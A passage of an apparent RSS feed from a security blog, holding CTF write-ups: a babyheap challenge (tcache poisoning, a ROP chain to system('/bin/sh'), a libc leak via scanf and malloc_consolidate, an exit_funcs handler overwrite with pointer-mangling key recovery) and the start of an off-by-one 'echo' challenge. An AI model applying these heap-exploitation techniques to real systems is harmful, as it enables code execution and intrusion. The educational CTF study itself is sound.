&lt;p&gt;Keep in mind: &lt;code&gt;malloc()&lt;/code&gt; zeroes out the first &lt;code&gt;0x10&lt;/code&gt; bytes, so we must allocate at an &lt;strong&gt;offset&lt;/strong&gt;. In this case, we offset by &lt;code&gt;0x18&lt;/code&gt; because chunks must also be aligned to &lt;code&gt;0x10&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;environ_leak = u64(read(r, 10)[0x18:0x20])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;From here we get the environment stack variables and subtract the &lt;code&gt;main&lt;/code&gt; return address from it, we get a permanent offset that when added on our environ leak will yield us the main address.&lt;/p&gt;
&lt;p&gt;Using our &lt;strong&gt;tcache poisoning technique&lt;/strong&gt; again, we can modify the return address and set a ROP gadget chain, I opted for:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pop_rdi = libc_base + 0x000000000010f75b
binsh = libc.binsh() + libc_base
ret = pop_rdi + 1
system = libc_base + libc.symbols.system

return_pointer = environ_leak - 0x130 # 0x130 is the offset from environ to main return
update(r, 9, p64((return_pointer-0x08) ^ mask)) # 0x08 for heap alignment
create(r, 11, b&quot;dummy&quot;)
create(r, 12, p64(0) + p64(pop_rdi) + p64(binsh) + p64(ret) + p64(system))

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We need to add a single ret instruction because the stack is not aligned to a multiple of &lt;code&gt;0x10&lt;/code&gt;. Using the &lt;code&gt;pop rdi&lt;/code&gt; instruction and summing $1$ gives us a single &lt;code&gt;ret&lt;/code&gt; instruction because &lt;code&gt;pop rdi&lt;/code&gt; is a single byte.&lt;/p&gt;
&lt;p&gt;:::note
Sometimes a perfect ROP chain still crashes the target. One common cause is stack misalignment. Many &lt;code&gt;libc&lt;/code&gt; functions require the stack to be &lt;code&gt;0x10&lt;/code&gt; aligned to accommodate &lt;a href=&quot;https://stackoverflow.com/questions/1422149/what-is-vectorization#1422181&quot;&gt;SIMD instructions&lt;/a&gt; . Adding a single &lt;code&gt;ret&lt;/code&gt; gadget before your chain moves the stack by &lt;code&gt;0x08&lt;/code&gt;, fixing the alignment.
:::&lt;/p&gt;
&lt;p&gt;Now when returning &lt;code&gt;system(/bin/sh)&lt;/code&gt; will be executed giving us a &lt;strong&gt;shell&lt;/strong&gt;.&lt;/p&gt;
</content:encoded><author>David Hermes</author></item><item><title>Babyheap: JustCTF - Chapter 2</title><link>https://blog.davidherm.es/posts/babyheap_2</link><guid isPermaLink="true">https://blog.davidherm.es/posts/babyheap_2</guid><description>continuation of the babyheap writeup focusing on exit_func overwrite and scanf trickery.</description><pubDate>Tue, 21 Oct 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Let&apos;s tackle the next chapter of babyheap, this one is a bit more exotic...&lt;/p&gt;
&lt;h2&gt;scanf and black magic&lt;/h2&gt;
&lt;p&gt;Let’s examine the menu’s &lt;code&gt;scanf&lt;/code&gt; input function.&lt;br /&gt;
&lt;strong&gt;Question:&lt;/strong&gt; how can you send it an arbitrarily long number without triggering a buffer overflow?&lt;br /&gt;
&lt;strong&gt;Answer:&lt;/strong&gt; it uses the heap.&lt;/p&gt;
&lt;h3&gt;Ocean of scanf&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;//babyheap main function
printf(&quot;Menu:\n1) Create\n2) Read\n3) Update\n4) Delete\n0) Quit\n&amp;gt; &quot;);
if ( (unsigned int)__isoc99_scanf(&quot; %d&quot;, &amp;amp;v4) != 1 )
{
	puts(&quot;Invalid input&quot;);
	exit(0);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But if &lt;code&gt;scanf()&lt;/code&gt; always uses the heap then why don&apos;t we see tcache chunks in the free list after every execution? To understand what is going on, let&apos;s start &lt;code&gt;gdb&lt;/code&gt; and set a breakpoint at &lt;code&gt;*malloc&lt;/code&gt;.
If we send 42 to scanf, malloc doesn&apos;t get called, but when we send a very big number, the program breaks at a malloc call! Using &lt;code&gt;finish&lt;/code&gt; we can exit the malloc call and see the function that executes it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   0x7ffff7ca9a3b &amp;lt;__GI___libc_scratch_buffer_grow_preserve+107&amp;gt;:       call   QWORD PTR [rip+0x15f597]        # 0x7ffff7e08fd8 (malloc)
=&amp;gt; 0x7ffff7ca9a41 &amp;lt;__GI___libc_scratch_buffer_grow_preserve+113&amp;gt;:       mov    rdi,rax
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;libc_scratch_buffer_grow_preserve()&lt;/code&gt; Is our perpetrator then, but let&apos;s step back and follow the implementation of &lt;code&gt;vfscanf()&lt;/code&gt;: after &quot;%d&quot; gets read by vfscanf, it enters a loop where every iteration a char is taken from stdin using &lt;code&gt;incchr()&lt;/code&gt; and moves the character into a &lt;em&gt;charbuffer&lt;/em&gt; by calling &lt;code&gt;char_buffer_add()&lt;/code&gt; till an EOF is found or its width becomes zero.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/stdio-common/vfscanf-internal.c#L1823

while (c != EOF &amp;amp;&amp;amp; width != 0)
{
	... a LOT of stuff ...	
	
	char_buffer_add (&amp;amp;charbuf, c); &amp;lt;-- wrapper around wrapper around grow_preserve
	if (width &amp;gt; 0)
		--width;

	c = inchar ();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It then adds a zero byte at the end to transform the number into a string and executes &lt;code&gt;__strtol_internal&lt;/code&gt;, this function transforms the string into a &lt;strong&gt;long integer&lt;/strong&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/stdio-common/vfscanf-internal.c#L1932

/* Convert the number.  */
char_buffer_add (&amp;amp;charbuf, L_(&apos;\0&apos;));
if (char_buffer_error (&amp;amp;charbuf))
{
  ... error stuff ...
}
if (need_longlong &amp;amp;&amp;amp; (flags &amp;amp; LONGDBL))
{
  ... if a longlong is needed stuff ...
}
else
{
  if (flags &amp;amp; NUMBER_SIGNED)
num.l = __strtol_internal                                    //&amp;lt;-- HERE
  (char_buffer_start (&amp;amp;charbuf), &amp;amp;tw, base, flags &amp;amp; GROUP);
  else
num.ul = __strtoul_internal
  (char_buffer_start (&amp;amp;charbuf), &amp;amp;tw, base, flags &amp;amp; GROUP);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But by setting &quot;%d&quot; didn&apos;t we want to save an integer? Why is the string converted into a long integer? Don&apos;t worry, shortly after the above code the number gets cast into the right format and moved into the argument given to &lt;code&gt;scanf()&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/stdio-common/vfscanf-internal.c#L1961
 
if (!(flags &amp;amp; SUPPRESS))
{
	if (flags &amp;amp; NUMBER_SIGNED)
	{
	  if (need_longlong &amp;amp;&amp;amp; (flags &amp;amp; LONGDBL))
		*ARG (LONGLONG int *) = num.q;
	  else if (need_long &amp;amp;&amp;amp; (flags &amp;amp; LONG))
		*ARG (long int *) = num.l;
	  else if (flags &amp;amp; SHORT)
		*ARG (short int *) = (short int) num.l;
	  else if (!(flags &amp;amp; CHAR))
		*ARG (int *) = (int) num.l;                    //&amp;lt;-- long to int and stored in the
	  else                                             //    argument given to scanf
		*ARG (signed char *) = (signed char) num.ul;
	}
	else
	{
	  ... same as above but unsigned ...
	}
	
	... more stuff...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now we know how a number gets transformed into an integer. But we &lt;strong&gt;ignored a key aspect&lt;/strong&gt; of this code: &lt;code&gt;char_buffer_add&lt;/code&gt; moves characters from stdin into a buffer, so let&apos;s understand how the function works.
This function is a wrapper around &lt;code&gt;char_buffer_add_slow()&lt;/code&gt; which uses a &lt;strong&gt;scratch_buffer&lt;/strong&gt; to save data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals https://elixir.bootlin.com/glibc/glibc-2.42.9000/source/include/scratch_buffer.h#L66
struct scratch_buffer {
  void *data;    /* Pointer to the beginning of the scratch area.  */
  size_t length; /* Allocated space at the data pointer, in bytes.  */
  union { max_align_t __align; char __c[1024]; } __space;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This struct contains a &lt;strong&gt;pointer&lt;/strong&gt; to a writable buffer (&lt;code&gt;*data&lt;/code&gt;), the &lt;strong&gt;length&lt;/strong&gt; of said buffer (&lt;code&gt;length&lt;/code&gt;), and the &lt;strong&gt;1024 byte memory area&lt;/strong&gt; itself (&lt;code&gt;__space&lt;/code&gt;).
In the initialization process of the &lt;code&gt;scratch_buffer&lt;/code&gt; the address of the memory area gets stored in &lt;code&gt;*data&lt;/code&gt;, if more than 1024 bytes must be stored, &lt;code&gt;char_buffer_add_slow()&lt;/code&gt; will call &lt;code&gt;__libc_scratch_buffer_grow_preserve&lt;/code&gt;, this functions allocates a new buffer in the heap with double the size and modifies the &lt;code&gt;*data&lt;/code&gt; pointer and the length.
This is why malloc gets called only when big numbers are sent to &lt;code&gt;scanf&lt;/code&gt;, we need more than 1024 characters to trigger the heap allocation.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals
__libc_scratch_buffer_grow_preserve (struct scratch_buffer *buffer)
{
	size_t new_length = 2 * buffer-&amp;gt;length; &amp;lt;--- 1024 * 2
	void *new_ptr;
	
	if (buffer-&amp;gt;data == buffer-&amp;gt;__space.__c)
    {
	/* Move buffer to the heap.  No overflow is possible because
	buffer-&amp;gt;length describes a small buffer on the stack.  */
	new_ptr = malloc (new_length);                   //&amp;lt;-- HERE WE BREAKED
	if (new_ptr == NULL)
		return false;
	memcpy (new_ptr, buffer-&amp;gt;__space.__c, buffer-&amp;gt;length);
    }
	else
    {
	/* Buffer was already on the heap.  Check for overflow.  */
	if (__glibc_likely (new_length &amp;gt;= buffer-&amp;gt;length))
		new_ptr = realloc (buffer-&amp;gt;data, new_length);
    else
	{
		... error stuff ...
	}

    if (__glibc_unlikely (new_ptr == NULL))
	{
		/* Deallocate, but buffer must remain valid to free.  */
		free (buffer-&amp;gt;data);
		scratch_buffer_init (buffer);
		return false;
	}
    }
    
	/* Install new heap-based buffer.  */
	buffer-&amp;gt;data = new_ptr;
	buffer-&amp;gt;length = new_length;
	return true;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now we know in which situation &lt;code&gt;malloc&lt;/code&gt; gets called from &lt;code&gt;scanf&lt;/code&gt;, but how can this be helpful to our purpose of &lt;strong&gt;leaking a libc address pointer?&lt;/strong&gt; The scratchpad gets freed after usage and removed from the heap, so how can we maintain a freed chunk in the small or large bins with this knowledge? It seems that our deep dive is not finished yet... enter the depths of malloc.&lt;/p&gt;
&lt;h3&gt;Deep into malloc&lt;/h3&gt;
&lt;p&gt;Looking at the &lt;code&gt;malloc()&lt;/code&gt; implementation inside &lt;code&gt;libc&lt;/code&gt;, we notice that if the requested chunk is larger than the biggest chunk size stored in the &lt;code&gt;smallbins&lt;/code&gt;, &lt;code&gt;malloc_consolidate()&lt;/code&gt; is called.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals
static void *
_int_malloc (mstate av, size_t bytes)
{
	INTERNAL_SIZE_T nb;               /* normalized request size */
	
	... to much stuff here, like a loooot ...
	
	if (in_smallbin_range (nb))
	{
	    ... a bit of stuff here ...
	} 
    else
    {
	    /*
	     If this is a large request, consolidate fastbins before continuing.
	     While it might look excessive to kill all fastbins before
	     even seeing if there is space available, this avoids
	     fragmentation problems normally associated with fastbins.
	     [...]
		*/
		
	    idx = largebin_index (nb);
	    if (have_fastchunks (av))
        malloc_consolidate (av);     //&amp;lt;--- oh look, malloc_consolidate
    }
    
    ... a league of legends lootbox full of stuff here ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The macro &lt;code&gt;in_smallbin_range(nb)&lt;/code&gt; is a simple check that returns if the size of the chunk is small enough to stay in smallbins, by looking below we can calculate the smallbin max chunk size as 0x400.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals
#define NBINS             128
#define NSMALLBINS         64
#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT ` \\ normally 16
#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT &amp;gt; CHUNK_HDR_SZ)
#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)

#define in_smallbin_range(sz)  \
  ((unsigned long) (sz) &amp;lt; (unsigned long) MIN_LARGE_SIZE)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So what happens if we create a chunk bigger than 0x400 bytes? To answer that, we need to understand what &lt;code&gt;malloc_consolidate&lt;/code&gt; does.&lt;/p&gt;
&lt;p&gt;:::note
&lt;code&gt;malloc_consolidate()&lt;/code&gt; in glibc is a function that &lt;strong&gt;coalesces&lt;/strong&gt; small freed chunks from the fastbins into the &lt;strong&gt;unsortedbin&lt;/strong&gt;.
Normally, when a small chunk is freed and doesnt enter tcache, it goes into fastbin without being merged with adjacent free chunks to keep &lt;code&gt;free()&lt;/code&gt; fast.
Over time, this can fragment memory. When &lt;code&gt;malloc()&lt;/code&gt; needs a lot of space (when allocating a largebin for example) it calls &lt;code&gt;malloc_consolidate()&lt;/code&gt;
:::&lt;/p&gt;
&lt;p&gt;This means that if we generate a fastbin chunk and trigger in some way &lt;code&gt;malloc_consolidate&lt;/code&gt; the generated fastbin chunk gets moved into the &lt;strong&gt;smallbin&lt;/strong&gt; even if it&apos;s a small chunk. Reading this chunk gives us a libc leak.
But as we discovered before, to execute &lt;code&gt;malloc_consolidate&lt;/code&gt; we need to allocate a chunk of size 0x400 or greater, this is where our scanf trick comes handy.&lt;/p&gt;
&lt;h3&gt;Putting it all together.&lt;/h3&gt;
&lt;p&gt;We start by generating eight chunks (7 tcache + 1 fastbin) and free them in a particular order to guarantee that the &lt;strong&gt;fastbin chunk&lt;/strong&gt; is &lt;strong&gt;not&lt;/strong&gt; the last one in heap memory. Else, the fastbin chunk would simply be trimmed by malloc_consolidate.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-011.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Now we can apply the knowledge gotten from scanf and malloc, let&apos;s allocate a chunk big enough to trigger a &lt;code&gt;malloc&lt;/code&gt; in &lt;code&gt;scanf&lt;/code&gt;, and greater than the smallbin max size to trigger &lt;code&gt;malloc_consolidate&lt;/code&gt;.
To achieve this we can send &lt;code&gt;b&quot;1&quot;*0x500&lt;/code&gt; to &lt;code&gt;scanf&lt;/code&gt;, this is bigger than &lt;code&gt;0x400&lt;/code&gt; so both &lt;code&gt;scratch_buffer_grow_preserve()&lt;/code&gt; and &lt;code&gt;malloc_consolidate()&lt;/code&gt; get triggered. The &lt;strong&gt;fastbin&lt;/strong&gt; chunk gets moved to the &lt;strong&gt;unsortedbin&lt;/strong&gt; and then into the &lt;strong&gt;smallbin&lt;/strong&gt; list once the big chunk gets freed after scanf got called.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-012.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;by using &lt;code&gt;chunk_read()&lt;/code&gt; on the first chunk we can leak the libc address!!!!!!!&lt;/p&gt;
&lt;h2&gt;Exploiting with exit_func overwrite&lt;/h2&gt;
&lt;p&gt;Looking at the &lt;code&gt;exit()&lt;/code&gt; function, we notice that it is only a wrapper around &lt;code&gt;__run_exit_handlers()&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals
void exit (int status)
{
  __run_exit_handlers (status, &amp;amp;__exit_funcs, true, true);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This function executes so-called &lt;code&gt;exit_functions&lt;/code&gt; saved into the &lt;code&gt;__exit_funcs&lt;/code&gt; global structure. Exit functions can also be registered by the user using &lt;code&gt;atexit()&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//example snippet
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;

void cleanup1(void) { puts(&quot;cleanup1&quot;); }
void cleanup2(void) { puts(&quot;cleanup2&quot;); }

int main(void) {
    atexit(cleanup1);
    atexit(cleanup2);
    printf(&quot;Exiting...\n&quot;);
    return 0; // triggers cleanup2 then cleanup1
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, what exactly is an &lt;em&gt;exit_function&lt;/em&gt;?&lt;br /&gt;
Looking at the code below, we can see that an &lt;code&gt;exit_function&lt;/code&gt; is a &lt;strong&gt;struct&lt;/strong&gt; that &lt;strong&gt;wraps a function call&lt;/strong&gt;. The &lt;code&gt;flavor&lt;/code&gt; field indicates that there are multiple types of exit functions that take different combinations of arguments.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals
struct exit_function
  {
    long int flavor;
    union
    {
		void (*at) (void);
		struct
		{
		    void (*fn) (int status, void *arg);
		    void *arg;
		} on;
		struct
		{
		    void (*fn) (void *arg, int status);
		    void *arg;
		    void *dso_handle;
		} cxa;
    } func;
  };
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looking at the snippet &lt;code&gt;run_exit_handlers()&lt;/code&gt; below we can see how the flavors change the execution of an exit function:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;ef_free&lt;/strong&gt;: slot is dead, ignore&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ef_us&lt;/strong&gt;: nothing happens&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ef_on&lt;/strong&gt;: status code as first argument and user supplied argument as second one&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ef_at&lt;/strong&gt;: function without arguments&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ef_cxa&lt;/strong&gt;: the important one, &lt;strong&gt;first argument is user supplied&lt;/strong&gt; and second one is the status code.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;:::note
By looking at the example above you can notice that &lt;code&gt;atexit()&lt;/code&gt; only registers &lt;strong&gt;ef_at&lt;/strong&gt; functions, if you want to register &lt;strong&gt;ef_on&lt;/strong&gt; functions there is a GNU extensions that implements &lt;code&gt;on_exit()&lt;/code&gt;.
:::
&lt;strong&gt;Question:&lt;/strong&gt; Why is &lt;code&gt;ef_cxa&lt;/code&gt; the best flavor?
&lt;strong&gt;Answer:&lt;/strong&gt; We can overwrite the function pointer with &lt;code&gt;system()&lt;/code&gt; and set the first argument as &lt;code&gt;/bin/sh&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//glibc internals
__run_exit_handlers (int status, struct exit_function_list **listp,
			bool run_list_atexit, bool run_dtors)
{

...

while (cur-&amp;gt;idx &amp;gt; 0)
	{
	struct exit_function *const f = &amp;amp;cur-&amp;gt;fns[--cur-&amp;gt;idx];
	const uint64_t new_exitfn_called = __new_exitfn_called;
	
	__libc_lock_unlock (__exit_funcs_lock);
	switch (f-&amp;gt;flavor)
	{
		void (*atfct) (void);
		void (*onfct) (int status, void *arg);
		void (*cxafct) (void *arg, int status);
		
		case ef_free:
		case ef_us:
			break;
	    case ef_on:
			onfct = f-&amp;gt;func.on.fn;
			onfct (status, f-&amp;gt;func.on.arg);
			break;
	    case ef_at:
			atfct = f-&amp;gt;func.at;
			atfct ();
			break;
	    case ef_cxa:
			f-&amp;gt;flavor = ef_free;
			cxafct = f-&amp;gt;func.cxa.fn;
			cxafct (f-&amp;gt;func.cxa.arg, status); // &amp;lt;-- cxa is executed here 
			break;
	}
	  __libc_lock_lock (__exit_funcs_lock);
	  if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
	    goto restart;
	}

...

}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Putting it all together&lt;/h3&gt;
&lt;p&gt;In practice, we are going to inspect the &lt;strong&gt;exit handler array entries&lt;/strong&gt;, look for an exit handler with &lt;code&gt;flavor == 4 (ef_cxa)&lt;/code&gt; to overwrite with a pointer to &lt;code&gt;system()&lt;/code&gt;, and then set &lt;code&gt;/bin/sh&lt;/code&gt; as its first argument. Getting a shell from there is as easy as executing the binary and exiting.&lt;/p&gt;
&lt;h4&gt;Step 1: Getting the __exit_funcs struct&lt;/h4&gt;
&lt;p&gt;Using our &lt;em&gt;libc leak&lt;/em&gt; obtained before, we get the &lt;code&gt;__exit_funcs&lt;/code&gt; struct by summing the offset of the struct with the libc base address. libc uses the symbol &lt;code&gt;initial&lt;/code&gt; to point at the exit_funcs, if needed, bigger arrays can be generated to extend the number of exit functions that can be registered, this one is the initial array that always exists:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;__exit_funcs = libc_base + libc.symbols.initial
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We then overwrite the first &lt;strong&gt;tcache forward pointer&lt;/strong&gt; with this address, remember that when malloc is called the first 16 bytes get zeroed out.
After calling &lt;code&gt;malloc()&lt;/code&gt; twice, the second call will return a pointer to the &lt;code&gt;initial&lt;/code&gt; struct, now we can edit and read from it.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pwndbg&amp;gt; tele 0x7f3046204fc0 &amp;lt;-- libc_base + initial offset
00:0000│  0x7f3046204fc0 (initial) ◂— 0
01:0008│  0x7f3046204fc8 (initial+8) ◂— 1 &amp;lt;-- number of registered funcs
02:0010│  0x7f3046204fd0 (initial+16) ◂— 4 &amp;lt;-- flavor
03:0018│  0x7f3046204fd8 (initial+24) ◂— 0x91b97d6d433887e0 &amp;lt;-- function addrs
04:0020│  0x7f3046204fe0 (initial+32) ◂— 0 &amp;lt;-- argument
... ↓     3 skipped
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looking at the output from pwndbg above, we notice only one entry in the array, fortunately this is a &lt;code&gt;ef_cxa&lt;/code&gt; entry, now we only need to replace it with the &lt;code&gt;system()&lt;/code&gt; function.&lt;/p&gt;
&lt;h4&gt;Step 2: Replacing function with system()&lt;/h4&gt;
&lt;p&gt;Do you notice something wrong with the function address in the snipped above? That&apos;s &lt;strong&gt;not&lt;/strong&gt; an address. When an atexit function gets registered, its address is xored with a key called &lt;strong&gt;pointer_chk_guard&lt;/strong&gt; and then rotated left by 17 bits (0x11).&lt;br /&gt;
$$
\text{mangled_address} = \texttt{rol}(\text{address} \oplus\ \text{key} , \text{0x11})
$$
$$
\text{address} = \texttt{ror}(\text{mangled_address}, \text{0x11})\ \oplus\ \text{key}
$$
But by performing a &lt;code&gt;ROR&lt;/code&gt; (rotate right) by 0x11 bits on the mangled address and then &lt;code&gt;XOR&lt;/code&gt;ing the result with the real address, we can easily recover the key.
$$
\text{key} = \texttt{ror}(\text{mangled_address}, \text{0x11})\ \oplus \ \text{address}
$$
Once we have the key, we can replace the old mangled function address with the mangled  &lt;code&gt;system()&lt;/code&gt; address and overwrite the argument &lt;code&gt;0&lt;/code&gt; with &lt;code&gt;/bin/sh\0&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;But how do we get the unmangled address to recover the key?&lt;br /&gt;
Set a breakpoint at &lt;code&gt;exit()&lt;/code&gt; and let the program hit it, then step till you find the &lt;code&gt;ROR&lt;/code&gt; and &lt;code&gt;XOR&lt;/code&gt; instructions. After the runtime demangles the function pointer you can read the real pointer.
Unfortunately, in our case the registered functions position is &lt;strong&gt;not&lt;/strong&gt; relative to &lt;code&gt;libc&lt;/code&gt; but to the dynamic loader (&lt;code&gt;ld&lt;/code&gt;). Fortunately, the &lt;code&gt;libc&lt;/code&gt; contains pointers into the loader mapping, so you can find those with &lt;code&gt;p2p libc ld&lt;/code&gt; and use them to resolve the loader base.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-018.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Using the same tcache poisoning technique we applied to read and modify the exit function array, we can also leak the loader’s address.&lt;br /&gt;
We’ll use the last pointer in the output from &lt;code&gt;p2p&lt;/code&gt;, since &lt;code&gt;malloc()&lt;/code&gt; writes directly into the allocated area before being able to read meaning we need a writable leak.&lt;br /&gt;
Once again, we overwrite the first tcache chunk’s forward pointer with this address, allocate two chunks, and then read from the second one to obtain the loader leak.&lt;/p&gt;
&lt;p&gt;:::note
The &lt;strong&gt;pointer_chk_guard&lt;/strong&gt; is an element of the &lt;strong&gt;Thread Control Block&lt;/strong&gt; (TCB) stored inside the &lt;strong&gt;Thread Local Storage&lt;/strong&gt; (TLS). TLS is a fixed per-thread storage whose address is saved in a special register. Its position is randomized and very difficult to leak.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/writeup-001.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The first non address value you see is our &lt;strong&gt;canary&lt;/strong&gt; (&lt;code&gt;stack_chk_guard&lt;/code&gt;), you can notice the zero byte at the end, the value stored directly after is our &lt;strong&gt;key&lt;/strong&gt; (&lt;code&gt;pointer_chk_guard&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;But &lt;code&gt;pointer_chk_guard&lt;/code&gt; is derived from somewhere else:&lt;/p&gt;
&lt;p&gt;When the kernel loads an executable, by calling &lt;code&gt;execve&lt;/code&gt;, it writes a key-value structure called &lt;strong&gt;Auxiliary Vector&lt;/strong&gt; (auxv) into memory, here many critical values are saved, you can print them by setting the &lt;code&gt;LD_SHOW_AUXV=1&lt;/code&gt; environment variable.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;❯ LD_SHOW_AUXV=1 gdb
AT_SYSINFO_EHDR:      0x7fba40212000
AT_MINSIGSTKSZ:       3376
AT_HWCAP:             0x178bfbff
AT_PAGESZ:            4096
AT_CLKTCK:            100
AT_PHDR:              0x562b9823f040
AT_PHENT:             56
AT_PHNUM:             15
AT_BASE:              0x7fba40214000
AT_FLAGS:             0x0
AT_ENTRY:             0x562b982f3ac0
AT_UID:               1000
AT_EUID:              1000
AT_GID:               1000
AT_EGID:              1000
AT_SECURE:            0
AT_RANDOM:            0x7ffee4809839
AT_HWCAP2:            0x2
AT_EXECFN:            /usr/bin/gdb
AT_PLATFORM:          x86_64
AT_RSEQ_FEATURE_SIZE: 28
AT_RSEQ_ALIGN:        32
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;looking at the &lt;code&gt;AT_RANDOM&lt;/code&gt; entry, we see that it points to the stack. The kernel copies 16 bytes from kernel entropy into the stack at initialization: the first 8 bytes are our canary, the second giant word is our &lt;strong&gt;pointer_chk_guard&lt;/strong&gt;.
But why are the values copied into the TCB if they are saved on the stack too? Because every thread needs to access this values.
:::&lt;/p&gt;
&lt;h4&gt;Step 3: exiting gracefully&lt;/h4&gt;
&lt;p&gt;Now we have everything to get the key, by overwriting the struct with the mangled &lt;code&gt;system()&lt;/code&gt; address and &lt;code&gt;/bin/sh&lt;/code&gt; as a
rgument we simply need to run the program and exit to get a shell.&lt;/p&gt;
&lt;p&gt;Still questions about &lt;code&gt;__exit_functions&lt;/code&gt;? Here is a link to a nice &lt;a href=&quot;https://binholic.blogspot.com/2017/05/notes-on-abusing-exit-handlers.html&quot;&gt;blogpost&lt;/a&gt;.&lt;/p&gt;
</content:encoded><author>David Hermes</author></item><item><title>echo: Srdnlen Quals 2026</title><link>https://blog.davidherm.es/posts/echo</link><guid isPermaLink="true">https://blog.davidherm.es/posts/echo</guid><description>Interesting off by one ctf challenge.</description><pubDate>Tue, 03 Feb 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;What can you do with a single overflowing byte? Well... first let&apos;s look at the security mitigations.
You&apos;ll notice that this is a completely locked-down binary, but that won&apos;t stop us.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./images/index-001.webp&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Disassembly&lt;/h2&gt;
&lt;p&gt;There are three important functions in this binary:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;main()&lt;/code&gt;: simply calls our echo function.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;echo()&lt;/code&gt;:  internally calls &lt;code&gt;read_stdin()&lt;/code&gt; and prints the read text on stdout.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;read_stdin()&lt;/code&gt;: a strange wrapper around the standard &lt;code&gt;read()&lt;/code&gt; function.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &lt;code&gt;main&lt;/code&gt; function isn&apos;t that significant, so we can skip it for brevity and focus directly on &lt;code&gt;echo()&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;unsigned __int64 echo()
{
  char buffer[64]; // [rsp+0h] [rbp-50h] BYREF
  unsigned __int8 max_chars; // [rsp+40h] [rbp-10h]
  unsigned __int64 canary; // [rsp+48h] [rbp-8h]

  canary = __readfsqword(0x28u);
  memset(s, 0, sizeof(buffer));
  max_chars = 64;
  while ( 1 )
  {
    printf(&quot;echo &quot;);
    read_stdin(buffer, max_chars);
    if ( !buffer[0] )
      break;
    puts(buffer);
  }
  return canary - __readfsqword(0x28u);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This function does exactly what the name implies: it &lt;em&gt;requests&lt;/em&gt; max 64 bytes from stdin and sends it back to stdout through &lt;code&gt;puts(buffer)&lt;/code&gt;. There doesn&apos;t seem to be an overflow here without looking into &lt;code&gt;read_stdin()&lt;/code&gt;. Also, that stack canary will definitely be a problem later.&lt;/p&gt;
